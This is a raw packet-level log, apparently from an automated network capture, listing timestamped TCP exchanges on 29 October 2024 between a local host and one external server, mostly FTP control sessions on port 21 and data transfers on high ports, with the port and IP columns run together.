                                                      Oct 29, 2024 02:34:14.262079000 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.262087107 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.262101889 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.262114048 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.262126923 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.262150049 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.262165070 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.262180090 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.262224913 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.262243986 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.262259007 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.267860889 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.267918110 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.267926931 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.267965078 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.267973900 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.268018961 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.268028021 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.268353939 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.268394947 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.296958923 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:15.020529985 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:15.062679052 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:17.753228903 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:17.758589029 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:18.086822987 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:18.087490082 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:18.092855930 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:18.092927933 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:18.092997074 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:18.098285913 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:18.999876022 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.000103951 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.005903959 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.005914927 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.005929947 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.005939960 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.005990982 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.005999088 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.006000042 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.006036043 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.006069899 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.006081104 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.006110907 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.006146908 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.006191015 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.006230116 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.006333113 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.011449099 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.011506081 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.011507988 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.011516094 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.011523962 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.011533022 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.011542082 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.011555910 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.011600971 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.011745930 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.011795998 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.011812925 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.011837959 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.011877060 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.012113094 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.012135029 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.012170076 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.012168884 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.016912937 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.017118931 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.017287016 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.017326117 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.017359018 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.017374039 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.020324945 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.020869017 CET6094650021110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.020926952 CET5002160946192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.046967030 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.208082914 CET5002221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.213829994 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.214082003 CET5002221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:19.758639097 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:19.812935114 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:20.120454073 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:20.120609045 CET5002221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:20.125978947 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:20.458786964 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:20.458913088 CET5002221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:20.464356899 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:20.817456961 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:20.817593098 CET5002221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:20.823040962 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:21.156760931 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:21.157984018 CET5002221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:21.163630962 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:21.497343063 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:21.497560024 CET5002221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:21.503607035 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:21.835405111 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:21.835557938 CET5002221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:21.840922117 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:22.173280001 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:22.175395012 CET5002355195192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:22.180830956 CET5519550023110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:22.180893898 CET5002355195192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:22.181068897 CET5002221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:22.186709881 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:23.084356070 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:23.089374065 CET5002221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:23.096894979 CET2150022110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:23.097070932 CET5002221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:23.641345978 CET5519550023110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:23.641583920 CET5002355195192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:32.411880016 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:32.417419910 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:32.417501926 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:32.446688890 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:32.452068090 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:32.779055119 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:32.779495001 CET5002561202192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:32.784902096 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:32.784970999 CET5002561202192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:32.785063028 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:32.790390015 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.342677116 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.346383095 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:33.351805925 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.684034109 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.685501099 CET5002561202192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:33.690890074 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.690901995 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.690917969 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.690927982 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.690937996 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.690982103 CET5002561202192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:33.691051006 CET5002561202192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:33.691067934 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.691076994 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.691162109 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.691170931 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.691181898 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.691199064 CET5002561202192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:33.691309929 CET5002561202192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:33.693028927 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.693248034 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:33.696360111 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.696405888 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.696424007 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.696436882 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.696456909 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.696455002 CET5002561202192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:33.696491003 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.696496964 CET5002561202192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:33.696505070 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.696517944 CET5002561202192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:33.696548939 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.696594000 CET5002561202192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:33.696614981 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.696631908 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.696639061 CET5002561202192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:33.696656942 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.696669102 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.696815014 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.698535919 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.701951027 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.702054024 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.702063084 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.702097893 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.702352047 CET6120250025110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:33.705183029 CET5002561202192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:33.737169981 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:34.062570095 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:34.066940069 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:34.072242022 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:34.413302898 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:34.413419008 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:34.418713093 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:34.443399906 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:34.443651915 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:34.449446917 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:34.449496031 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:34.760296106 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:34.760427952 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:34.765877962 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:35.107671022 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:35.113332987 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:35.118741035 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:35.460683107 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:35.461265087 CET5002660557192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:35.466598988 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:35.466711044 CET5002660557192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:35.466751099 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:35.472033024 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.404479027 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.404776096 CET5002660557192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:36.410459995 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.410470009 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.410479069 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.410494089 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.410521030 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.410530090 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.410530090 CET5002660557192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:36.410537958 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.410546064 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.410557985 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.410567999 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.410602093 CET5002660557192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:36.410661936 CET5002660557192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:36.415890932 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.415925026 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.415942907 CET5002660557192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:36.415987015 CET5002660557192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:36.416197062 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.416205883 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.416214943 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.416223049 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.416233063 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.416245937 CET5002660557192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:36.416290045 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.416296959 CET5002660557192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:36.416299105 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.416310072 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.416317940 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.421277046 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.421411037 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.421957970 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.421968937 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.421977043 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.422000885 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.422009945 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.422018051 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.422025919 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.422462940 CET6055750026110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:36.422518015 CET5002660557192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:36.453259945 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:37.200793982 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:37.250132084 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:51.360970020 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:51.366430998 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:51.707825899 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:51.709767103 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:51.715246916 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:51.717072964 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:51.717170000 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:51.722471952 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.635413885 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.635653973 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.641268969 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.641285896 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.641326904 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.641350985 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.641364098 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.641402006 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.641406059 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.641422033 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.641432047 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.641453981 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.641500950 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.641506910 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.641515970 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.641560078 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.641571999 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.641581059 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.641623974 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.641678095 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.646769047 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.646779060 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.646827936 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.646879911 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.646889925 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.646898031 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.646908045 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.646943092 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.646981955 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.646992922 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.647028923 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.647037983 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.647080898 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.647109985 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.647119045 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.647147894 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.647170067 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.647202015 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.652183056 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.652323008 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.652333975 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.652384043 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.652457952 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.652489901 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.652527094 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.652535915 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.652544975 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.653007030 CET6369150027110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:52.653063059 CET5002763691192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:52.687675953 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:53.419935942 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:53.468930006 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:54.502511024 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:54.507993937 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:54.849283934 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:54.849675894 CET5002853571192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:54.855034113 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:54.855216980 CET5002853571192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:54.855336905 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:54.860588074 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.787322998 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.791218996 CET5002853571192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:55.796694994 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.796739101 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.796747923 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.796756983 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.796785116 CET5002853571192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:55.796830893 CET5002853571192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:55.796833038 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.796842098 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.796850920 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.796861887 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.796878099 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.796895027 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.796916962 CET5002853571192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:55.796992064 CET5002853571192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:55.802268028 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.802277088 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.802321911 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.802330971 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.802344084 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.802354097 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.802367926 CET5002853571192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:55.802407980 CET5002853571192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:55.802412987 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.802464962 CET5002853571192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:55.802480936 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.802489996 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.802504063 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.802546024 CET5002853571192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:55.807898998 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.808108091 CET5357150028110.4.45.197192.168.2.4
